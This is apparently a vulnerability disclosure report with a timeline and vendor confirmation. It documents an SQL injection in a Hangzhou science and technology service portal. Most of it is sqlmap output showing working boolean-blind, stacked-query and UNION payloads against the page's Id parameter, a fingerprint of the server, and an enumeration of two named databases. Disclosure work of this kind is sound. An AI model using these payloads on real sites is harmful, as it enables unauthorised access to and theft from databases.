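2015-09-29: Details reported to the vendor; awaiting vendor response
2015-10-02: CNCERT (National Internet Emergency Center) has not yet been able to contact the responsible organization; details disclosed only to the notifying bodies
2015-10-12: Details disclosed to core white hats and experts in related fields
2015-10-22: Details disclosed to regular white hats
2015-11-01: Details disclosed to intern white hats
2015-11-16: Details disclosed to the public
SQL injection
Hangzhou Science and Technology Innovation Comprehensive Service Network Platform, injection point: http://**.**.**.**/webhall/NewsDatail3.aspx?Id=198231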
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=198231 AND 3090=3090

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Id=198231;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: Id=-3887 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(66)+CHAR(87)+CHAR(122)+CHAR(86)+CHAR(99)+CHAR(73)+CHAR(87)+CHAR(109)+CHAR(73)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL--
---
[20:48:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:48:19] [INFO] fetching tables for database: techPlantform
[20:48:19] [INFO] the SQL query used returns 104 entries
Database: techPlantform
[104 tables]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=198231 AND 3090=3090

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Id=198231;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: Id=-3887 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(66)+CHAR(87)+CHAR(122)+CHAR(86)+CHAR(99)+CHAR(73)+CHAR(87)+CHAR(109)+CHAR(73)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL--
---
[20:59:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[20:59:58] [INFO] fetching tables for database: ShinyPortal_KeJiWang
[20:59:58] [INFO] the SQL query used returns 105 entries
Database: ShinyPortal_KeJiWang
[105 tables]
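Contact the website's developer
Severity: Medium
Vulnerability Rank: 9
Confirmation time: 2015-10-02 09:04
CNVD confirmed and reproduced the reported vulnerability and has passed it to CNCERT for dispatch to the Zhejiang sub-center, which will coordinate follow-up handling with the organization that manages the website.
None yet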